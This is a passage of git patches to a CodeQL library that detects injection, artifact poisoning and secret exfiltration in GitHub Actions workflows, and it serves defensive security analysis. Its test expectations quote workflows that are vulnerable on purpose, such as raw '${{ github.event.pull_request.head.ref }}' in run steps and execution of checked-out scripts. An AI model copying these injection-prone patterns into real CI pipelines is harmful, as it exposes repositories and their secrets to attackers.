+278,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) + madSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom or @@ -382,7 +378,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { */ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or - externallyDefinedStoreStep(node1, node2, c) or + madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or artifactToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index c13db5b8127..37f966668df 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -46,7 +46,7 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. */ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { - ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } + ArgumentInjectionFromMaDSink() { madSink(this, "argument-injection") } override string getCommand() { result = "unknown" } } diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index c2453cb1652..8cd589fa9f8 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -7,7 +7,7 @@ import codeql.actions.DataFlow class CodeInjectionSink extends DataFlow::Node { CodeInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "code-injection") + madSink(this, "code-injection") } } diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll index 8eda87f1cae..59d523cd582 100644 --- a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll @@ -5,7 +5,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } + CommandInjectionSink() { madSink(this, "command-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index e81c6954d72..41e72bc8388 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -44,7 +44,7 @@ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { } class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { - EnvPathInjectionFromMaDSink() { externallyDefinedSink(this, "envpath-injection") } + EnvPathInjectionFromMaDSink() { madSink(this, "envpath-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 86913421563..f5a3b5f89a8 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -46,7 +46,7 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { } class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { - EnvVarInjectionFromMaDSink() { externallyDefinedSink(this, "envvar-injection") } + EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } } /** diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll index 80e3d93ee69..ca0ac267131 100644 --- a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll +++ b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll @@ -5,7 +5,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow private class RequestForgerySink extends DataFlow::Node { - RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } + RequestForgerySink() { madSink(this, "request-forgery") } } /** diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll index 1886af435cf..0317ab28199 100644 --- a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -6,7 +6,7 @@ private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow private class SecretExfiltrationSink extends DataFlow::Node { - SecretExfiltrationSink() { externallyDefinedSink(this, "secret-exfiltration") } + SecretExfiltrationSink() { madSink(this, "secret-exfiltration") } } /** diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 3ea9050c832..b5ce78fe062 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 5f1c54e7003..6da9acda906 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") } } From 29d2b287c9e1d7538211d4dfaadc5174351ceef3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 10:14:39 +0200 Subject: [PATCH 0405/1267] tests: Organize tests --- .../security/ArtifactPoisoningQuery.qll | 2 + ...logs_gh-action-get-changed-files.model.yml | 10 + .../library-tests/poisonable_steps.expected | 3 +- ql/test/library-tests/test.expected | 247 ++++++++++-------- .../.github/workflows/artifactpoisoning1.yml | 61 ----- .../.github/workflows/artifactpoisoning3.yml} | 0 .../.github/workflows/artifactpoisoning4.yml} | 0 .../.github/workflows/artifactpoisoning5.yml | 23 ++ .../.github/workflows/artifactpoisoning6.yml | 30 +++ .../.github/workflows/artifactpoisoning7.yml | 24 +- .../.github/workflows/artifactpoisoning8.yml | 22 ++ .../CWE-094/CodeInjectionCritical.expected | 45 +++- .../CWE-094/CodeInjectionMedium.expected | 38 ++- .../.github/workflows/artifactpoisoning12.yml | 2 +- ...poisoning8.yml => artifactpoisoning71.yml} | 0 .../ArtifactPoisoningCritical.expected | 14 +- .../CWE-829/ArtifactPoisoningMedium.expected | 10 +- .../CWE-829/UnpinnedActionsTag.expected | 3 +- .../UntrustedCheckoutCritical.expected | 12 +- 19 files changed, 318 insertions(+), 228 deletions(-) create mode 100644 ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml rename ql/test/query-tests/Security/{CWE-829/.github/workflows/artifactpoisoning61.yml => CWE-094/.github/workflows/artifactpoisoning3.yml} (100%) rename ql/test/query-tests/Security/{CWE-829/.github/workflows/artifactpoisoning7.yml => CWE-094/.github/workflows/artifactpoisoning4.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning8.yml => artifactpoisoning71.yml} (100%) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index dd409bdbae2..541498ae574 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -254,6 +254,8 @@ class ArtifactPoisoningSink extends DataFlow::Node { poisonable.(UsesStep) = this.asExpr() ) and ( + // Check if the poisonable step is a local script execution step + // and the path of the command or script matches the path of the downloaded artifact not poisonable instanceof LocalScriptExecutionRunStep or poisonable .(LocalScriptExecutionRunStep) diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml new file mode 100644 index 00000000000..a437dc2c4f2 --- /dev/null +++ b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.added", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.modified", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.renamed", "PR changed files", "manual"] + diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 55105c39bdf..96dca7f0308 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -27,4 +27,5 @@ | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 08f9136f2e5..62b04344f39 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -74,7 +74,8 @@ steps | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -131,7 +132,8 @@ runSteps | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | ./foo/cmd | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -224,7 +226,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -377,138 +380,142 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| 